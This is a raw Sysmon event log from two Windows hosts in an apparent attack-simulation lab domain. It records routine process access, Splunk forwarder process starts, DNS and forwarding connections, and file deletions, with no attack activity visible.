12:21:49.428{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439739Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:49.428{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439738Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:49.427{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439737Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:49.427{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439736Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:49.427{42DC5269-CE96-6086-0500-00000000BA01}412528C:\Windows\system32\csrss.exe{42DC5269-01DD-6088-B128-00000000BA01}6788C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000439735Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:49.427{42DC5269-CF3C-6086-AA00-00000000BA01}41684996C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{42DC5269-01DD-6088-B128-00000000BA01}6788C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000439734Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:49.426{42DC5269-01DD-6088-B128-00000000BA01}6788C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{42DC5269-CE97-6086-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{42DC5269-CF3C-6086-AA00-00000000BA01}4168C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000439733Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:45.789{42DC5269-CEA9-6086-2900-00000000BA01}2824C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-932.attackrange.local58906-false10.0.0.2ip-10-0-0-2.us-west-2.compute.internal53domain 354300x8000000000000000439732Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:45.789{42DC5269-CEA9-6086-2900-00000000BA01}2824C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-932.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-932.attackrange.local64413- 354300x8000000000000000439731Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:45.650{42DC5269-CF43-6086-D800-00000000BA01}4100C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-932.attackrange.local62371-false10.0.1.12-8000- 10341000x8000000000000000439730Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:49.059{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439729Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:49.059{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291103Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:50.590{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC937DF630E5A3C1D7DA5D391E82EEEC,SHA256=A8714AD9BC46C2992817E7B512135BBBF5F35C8BBAA6003F4ED3BDBB042604F5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439764Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:50.087{42DC5269-CF3C-6086-AE00-00000000BA01}21884056C:\Windows\system32\conhost.exe{42DC5269-01DE-6088-B228-00000000BA01}2976C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439763Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:50.085{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439762Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:50.085{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439761Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:50.085{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439760Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:50.085{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439759Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:50.085{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439758Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:50.085{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439757Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:50.085{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439756Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:50.085{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439755Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:50.085{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439754Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:50.085{42DC5269-CE96-6086-0500-00000000BA01}412428C:\Windows\system32\csrss.exe{42DC5269-01DE-6088-B228-00000000BA01}2976C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000439753Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:50.084{42DC5269-CF3C-6086-AA00-00000000BA01}41684996C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{42DC5269-01DE-6088-B228-00000000BA01}2976C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000439752Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:50.084{42DC5269-01DE-6088-B228-00000000BA01}2976C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{42DC5269-CE97-6086-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{42DC5269-CF3C-6086-AA00-00000000BA01}4168C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000439751Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:50.083{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF9F2A9366FA1B469EAB5286E73347B4,SHA256=A5C3972E3E7C786D128F270094218ABB5DBC108D78F9EB8C6AA2F4FA95369CAF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439750Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:50.060{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439749Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:50.060{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000291102Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:48.352{BEA10069-D145-6086-C700-00000000BB01}2620C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-96.attackrange.local50592-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000291101Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:50.107{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=84F6662CA2CC937B9D4F1C2D1B9A5D98,SHA256=DBD93692C90A55BD5930869703D64D568730F601DB48DF6C3A7649D990718680,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291100Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:50.106{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F597F6AC75FAEF395A4028F724E74C0B,SHA256=4669C4FBE126004A7BB4C1FB2864CC66F0A65093672B083F74FBDDDFFCF56705,IMPHASH=00000000000000000000000000000000falsetrue 